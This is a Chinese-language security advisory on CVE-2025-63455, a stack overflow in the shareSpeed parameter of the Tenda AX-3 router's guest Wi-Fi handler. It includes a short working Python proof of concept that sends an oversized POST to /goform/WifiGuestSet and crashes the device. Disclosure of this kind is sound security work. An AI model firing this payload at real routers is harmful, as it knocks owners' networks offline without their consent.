Tenda AX-3 安全漏洞CVE-2025-63455

Tenda AX-3是中国腾达（Tenda）公司的一款无线路由器产品，搭载四核1.5GHz处理器，能够提供稳定的网络连接和高效的数据处理能力‌‌。

一、基本情况

Tenda AX-3 是一款面向家庭用户设计的双频无线路由器，支持最新的Wi-Fi 6（IEEE 802.11ax）标准，最高无线传输速率可达1775Mbps

Tenda AX-3 是配备4根外置6dBi增益天线并支持多种工作模式，包括Router模式、AP模式和无线中继模式，方便用户根据实际灵活部署。

栋科技漏洞库关注到Tenda AX-3 v16.03.12.10_CN版本存在安全漏洞，该漏洞现已经被追踪为CVE-2025-63455，漏洞CVSS 3.X评分7.5。

二、漏洞分析

CVE-2025-63455是位于Tenda AX-3 v16.03.12.10_CN版本的漏洞，漏洞源于fromSetWifiGusetBasic函数中shareSpeed参数存在栈溢出。

在fromSetWifiGusetBasic函数中，shareSpeed参数是通过websGetVar获得的，并传播到strcpy函数。

strcpy函数不限制shareSpeed参数的长度，目标缓冲区大小为16字节。

通过使用过长的shareSpeed参数创建请求，可以触发堆或堆栈溢出，从而导致拒绝服务（DoS）攻击。

三、POC概念验证

1、通过qemu系统或其他方式启动固件（真实机器）

2、使用以下POC攻击进行攻击

[/v]

import requests
url = "http://192.168.20.12/goform/WifiGuestSet"
shareSpeed = "A"*7000
data = {
"shareSpeed": shareSpeed
}
r = requests.post(url, data=data)
print(r.status_code, r.text)

[/lv]

3、结果显示：目标路由器崩溃，无法正确和持久地提供服务。

四、影响范围

Tenda AX-3 v16.03.12.10_CN

五、修复建议

未知

六、参考链接

管理员已设置登录后刷新可查看